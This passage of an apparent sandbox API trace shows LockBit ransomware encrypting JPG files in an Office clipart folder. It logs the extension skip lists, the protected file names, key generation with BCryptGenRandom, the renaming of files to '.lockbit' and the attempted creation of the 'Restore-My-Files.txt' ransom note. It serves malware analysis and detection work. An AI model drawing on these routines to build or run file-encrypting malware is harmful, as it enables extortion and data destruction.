lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.476] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.476] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.476] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.476] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.476] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382944.JPG") returned 1 [0159.476] lstrcmpiW (lpString1="ntldr", lpString2="J0382944.JPG") returned 1 [0159.476] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382944.JPG") returned 1 [0159.476] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382944.JPG") returned -1 [0159.476] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382944.JPG") returned -1 [0159.476] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382944.JPG") returned 1 [0159.477] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382944.JPG") returned -1 [0159.477] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.477] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG") returned=".JPG" [0159.477] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.477] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.477] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.477] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.477] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.477] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.478] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.478] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG.lockbit") returned 72 [0159.478] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382944.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0159.479] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.479] malloc (_Size=0x40068) returned 0x3f70048 [0159.479] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=81437) returned 1 [0159.479] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.480] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0159.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0159.481] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0160.266] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.266] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.266] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.338] free (_Block=0x1fa2ed8) [0160.338] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.338] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.338] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661aebd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1531c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382947.JPG", cAlternateFileName="")) returned 1 [0160.338] lstrcmpiW (lpString1=".", lpString2="J0382947.JPG") returned -1 [0160.338] lstrcmpiW (lpString1="..", lpString2="J0382947.JPG") returned -1 [0160.338] PathFindExtensionW (pszPath="J0382947.JPG") returned=".JPG" [0160.338] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.339] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.339] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.340] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.340] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.340] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.340] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.340] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.340] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.340] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.340] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.340] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382947.JPG") returned 1 [0160.340] lstrcmpiW (lpString1="ntldr", lpString2="J0382947.JPG") returned 1 [0160.340] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382947.JPG") returned 1 [0160.340] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382947.JPG") returned -1 [0160.340] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382947.JPG") returned -1 [0160.340] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382947.JPG") returned 1 [0160.340] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382947.JPG") returned -1 [0160.341] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.341] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG") returned=".JPG" [0160.341] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.341] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.341] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.342] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.342] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.342] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.342] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG.lockbit") returned 72 [0160.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382947.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.344] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.344] malloc (_Size=0x40068) returned 0x3df0008 [0160.344] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=86812) returned 1 [0160.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.345] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.350] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.350] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.350] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.353] free (_Block=0x1fa2ed8) [0160.353] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.353] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.353] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.353] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1ad37, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382948.JPG", cAlternateFileName="")) returned 1 [0160.353] lstrcmpiW (lpString1=".", lpString2="J0382948.JPG") returned -1 [0160.353] lstrcmpiW (lpString1="..", lpString2="J0382948.JPG") returned -1 [0160.353] PathFindExtensionW (pszPath="J0382948.JPG") returned=".JPG" [0160.353] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.353] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.353] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.353] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.353] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.353] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.354] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.354] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382948.JPG") returned 1 [0160.355] lstrcmpiW (lpString1="ntldr", lpString2="J0382948.JPG") returned 1 [0160.355] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382948.JPG") returned 1 [0160.355] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382948.JPG") returned -1 [0160.355] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382948.JPG") returned -1 [0160.355] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382948.JPG") returned 1 [0160.355] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382948.JPG") returned -1 [0160.355] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.355] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG") returned=".JPG" [0160.355] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.355] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.355] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.356] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.356] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.356] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG.lockbit") returned 72 [0160.356] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382948.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.357] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.358] malloc (_Size=0x40068) returned 0x3df0008 [0160.358] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=109879) returned 1 [0160.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.359] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.359] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.364] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.364] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.364] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.368] free (_Block=0x1fa2ed8) [0160.369] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.369] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft 